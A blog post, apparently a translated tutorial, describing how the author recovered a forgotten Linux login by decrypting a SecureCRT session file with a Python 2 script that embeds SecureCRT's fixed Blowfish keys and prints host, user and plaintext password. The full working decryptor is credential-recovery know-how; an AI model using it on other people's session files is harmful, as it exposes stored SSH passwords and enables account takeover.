Using python to retrieve the Linux login password in SecureCRT

Keywords: Python Linux Session ssh

A Linux system was installed in the virtual machine on the notebook. It didn't work for a while. Suddenly, when it was used, I found that the password had been forgotten.
Fortunately, I have used secureCRT software to connect to Linux before, so I can easily use python to retrieve the password.

Final effect

The red box indicates the password

Get ready

Download and install python , and configure the system global variables. I use python 2.7 here

python dependency package

Download python decryption dependency package: https://pypi.python.org/pypi/...
Unzip the file, use the command-line tool to enter the unzipped directory, and execute the following command

python setup.py build
python setup.py install

If the following situation occurs

There is another way to install
Download the version of your own environment here http://www.voidspace.org.uk/p...

My download is PyCrypto 2.6 for Python 2.7 32bit

Download and run the installation directly

Start looking back

Find the location where SecureCRT stores the password
*User name AppDataRoamingVanDykeConfigSessions*
perhaps
*DataSettingsConfigSessions under the software directory*

I have 10.0.0.100.ini

Copy the following code and save the file to the above directory, named secureDecode.py

from Crypto.Cipher import Blowfish
import argparse
import re

def decrypt(password) :
    c1 = Blowfish.new('5F B0 45 A2 94 17 D9 16 C6 C6 A2 FF 06 41 82 B7'.replace(' ','').decode('hex'), Blowfish.MODE_CBC, '\x00'*8)
    c2 = Blowfish.new('24 A6 3D DE 5B D3 B3 82 9C 7E 06 F4 08 16 AA 07'.replace(' ','').decode('hex'), Blowfish.MODE_CBC, '\x00'*8)
    padded = c1.decrypt(c2.decrypt(password.decode('hex'))[4:-4])
    p = ''
    while padded[:2] != '\x00\x00' :
        p += padded[:2]
        padded = padded[2:]
    return p.decode('UTF-16')

REGEX_HOSTNAME = re.compile(ur'S:"Hostname"=([^\r\n]*)')
REGEX_PASWORD = re.compile(ur'S:"Password"=u([0-9a-f]+)')
REGEX_PORT = re.compile(ur'D:"\[SSH2\] Port"=([0-9a-f]{8})')
REGEX_USERNAME = re.compile(ur'S:"Username"=([^\r\n]*)')

def hostname(x) :
    m = REGEX_HOSTNAME.search(x)
    if m :
        return m.group(1)
    return '???'

def password(x) :
    m = REGEX_PASWORD.search(x)
    if m :
        return decrypt(m.group(1))
    return '???'

def port(x) :
    m = REGEX_PORT.search(x)
    if m :
        return '-p %d '%(int(m.group(1), 16))
    return ''

def username(x) :
    m = REGEX_USERNAME.search(x)
    if m :
        return m.group(1) + '@'
    return ''

parser = argparse.ArgumentParser(description='Tool to decrypt SSHv2 passwords in VanDyke Secure CRT session files')
parser.add_argument('files', type=argparse.FileType('r'), nargs='+',
    help='session file(s)')

args = parser.parse_args()

for f in args.files :
    c = f.read().replace('\x00', '')
    print f.name
    print "ssh %s%s%s # %s"%(port(c), username(c), hostname(c), password(c))

Then use the command line tool to enter the directory and run the following command

python secureDecode.py 10.0.0.100.ini

Finally, the password was retrieved successfully

Reference articles
Retrieve SecureCRT password
How to solve pycrypto module installation failure

Posted by .-INSANE-. on Thu, 12 Dec 2019 13:31:07 -0800

Hot Keywords

©2024 Programmer Group